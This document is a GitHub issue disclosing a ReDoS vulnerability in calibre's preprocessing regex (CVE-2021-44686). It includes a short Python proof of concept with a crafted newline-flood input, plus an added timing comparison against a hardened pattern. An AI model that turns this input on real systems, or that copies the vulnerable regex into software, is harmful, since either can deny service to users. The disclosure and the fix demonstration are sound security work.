
ReDoS in calibre #18

Closed
dwisiswant0 opened this issue Nov 23, 2021 · 1 comment
Labels: disclosed (Disclosure/advisory has been published & disclosed), patched (Patch version released), poc (Proof-of-concept dropped)


dwisiswant0 commented Nov 23, 2021

Description

calibre before 5.32.0 contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).

CVE ID: CVE-2021-44686

Proof of Concept

Vulnerable code: https://github.com/kovidgoyal/calibre/blob/39a22268b930f0d0cf51a42b556982da5f3dbf4d/src/calibre/ebooks/conversion/preprocess.py#L383

To see that the regular expression is vulnerable, copy-paste it into a separate file & run the code as shown below.

import re

reg = re.compile(r'<head[^>]*>\n*(.*?)\n*</head>', re.IGNORECASE|re.DOTALL)
reg.match('<head>' + '\n' * 1337)

Impact

This issue may lead to a denial of service.

References

@dwisiswant0 dwisiswant0 added the needs triage Coordinated disclosure that need to be triaged label Nov 23, 2021
@dwisiswant0 dwisiswant0 self-assigned this Nov 23, 2021
@dwisiswant0 dwisiswant0 added this to Needs triage in Advisory via automation Nov 23, 2021
@dwisiswant0 dwisiswant0 added patched Patch version released triaged Disclosure triaged and removed needs triage Coordinated disclosure that need to be triaged labels Nov 23, 2021
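The following is an added illustration, not code from the issue or from calibre: it places the reported pattern beside an assumed hardened form (a single lazy group with the newline trimming moved out of the regex; this is not claimed to be the upstream patch) and times both on inputs shaped like the PoC so the super-linear growth is visible.

```python
import re
import time

# The pattern reported in the issue. Under re.DOTALL '.' also matches '\n', so the
# leading '\n*', the lazy '(.*?)' and the trailing '\n*' all compete for the same run
# of newlines; when '</head>' is absent the engine backtracks through every way of
# splitting that run (roughly cubic in the number of newlines) before giving up.
VULNERABLE = re.compile(r'<head[^>]*>\n*(.*?)\n*</head>', re.IGNORECASE | re.DOTALL)

# Assumed hardened form (an illustration, not the upstream fix): one lazy group with
# no adjacent overlapping quantifiers, so a failing match costs linear time.
HARDENED = re.compile(r'<head[^>]*>(.*?)</head>', re.IGNORECASE | re.DOTALL)


def extract_head_vulnerable(html):
    m = VULNERABLE.match(html)
    return m.group(1) if m else None


def extract_head_hardened(html):
    m = HARDENED.match(html)
    # Trimming surrounding newlines here reproduces what the two '\n*' did inline.
    return m.group(1).strip('\n') if m else None


def attack_input(n):
    # Constructed input in the shape of the PoC: an opening tag, n newlines, no closing tag.
    return '<head>' + '\n' * n


def time_match(regex, html):
    """Seconds spent in a single match attempt."""
    start = time.perf_counter()
    regex.match(html)
    return time.perf_counter() - start


if __name__ == '__main__':
    # Doubling n multiplies the vulnerable pattern's time by about eight; the
    # hardened pattern stays in the microsecond range.
    for name, rx in (('vulnerable', VULNERABLE), ('hardened', HARDENED)):
        for n in (100, 200, 400):
            print(f'{name:10s} n={n:4d} {time_match(rx, attack_input(n)) * 1000:9.3f} ms')
```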
dwisiswant0 (Owner, Author) commented

CVE requested.

@dwisiswant0 dwisiswant0 added TBD Advisory to be determined and removed triaged Disclosure triaged labels Dec 4, 2021
@github-actions github-actions bot removed the TBD Advisory to be determined label Dec 5, 2021
@dwisiswant0 dwisiswant0 added the disclosed Disclosure/advisory has been published & disclosed label Dec 6, 2021
@dwisiswant0 dwisiswant0 changed the title ReDoS in launchpad#1951979 ReDoS in calibre Dec 6, 2021
Advisory automation moved this from Needs triage to Disclosed Dec 6, 2021
@dwisiswant0 dwisiswant0 added the poc Proof-of-concept dropped label Dec 6, 2021